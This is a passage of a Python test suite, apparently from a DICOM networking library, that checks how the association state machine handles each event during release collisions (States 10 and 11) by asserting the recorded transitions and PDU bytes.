('send', a_associate_rj), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt4', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta10 + Evt5."""
# Sta10 + Evt5 -> <ignore> -> Sta10
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta10 + Evt6."""
# Sta10 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt6', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta10 + Evt7."""
# Sta10 + Evt7 -> <ignore> -> Sta10
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta10 + Evt8."""
# Sta10 + Evt8 -> <ignore> -> Sta10
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta10 + Evt9."""
# Sta10 + Evt9 -> <ignore> -> Sta10
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta10 + Evt10."""
# Sta10 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt10', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta10 + Evt11."""
# Sta10 + Evt11 -> <ignore> -> Sta10
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta10 + Evt12."""
# Sta10 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt12', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta10 + Evt13."""
# Sta10 + Evt13 -> AR-10 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-10: Issue A-RELEASE (rp) primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13'
]
def test_evt14(self):
"""Test Sta10 + Evt14."""
# Sta10 + Evt14 -> <ignore> -> Sta10
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt14'
]
def test_evt15(self):
"""Test Sta10 + Evt15."""
# Sta10 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt15', 'AA-1'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta10 + Evt16."""
# Sta10 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt16', 'AA-3'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta10 + Evt17."""
# Sta10 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt17', 'AA-4'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta10 + Evt18."""
# Sta10 + Evt18 -> <ignore> -> Sta10
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.2),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta10 + Evt19."""
# Sta10 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt19', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState11(TestStateBase):
"""Tests for State 11: Release collision req - awaiting A-RELEASE-RP PDU"""
def test_evt01(self):
"""Test Sta11 + Evt1."""
# Sta11 + Evt1 -> <ignore> -> Sta11
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta11 + Evt2."""
# Sta11 + Evt2 -> <ignore> -> Sta11
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta11 + Evt3."""
# Sta11 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt3',
]
def test_evt04(self):
"""Test Sta11 + Evt4."""
# Sta11 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rj),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt4',
]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta11 + Evt5."""
# Sta11 + Evt5 -> <ignore> -> Sta11
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta11 + Evt6."""
# Sta11 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rq),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt6',
]
def test_evt07(self):
"""Test Sta11 + Evt7."""
# Sta11 + Evt7 -> <ignore> -> Sta11
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt7'
]
def test_evt08(self):
"""Test Sta11 + Evt8."""
# Sta11 + Evt8 -> <ignore> -> Sta11
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt8'
]
def test_evt09(self):
"""Test Sta11 + Evt9."""
# Sta11 + Evt9 -> <ignore> -> Sta11
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt9'
]
def test_evt10(self):
"""Test Sta11 + Evt10."""
# Sta11 + Evt10 -> AA-8 -> Sta13
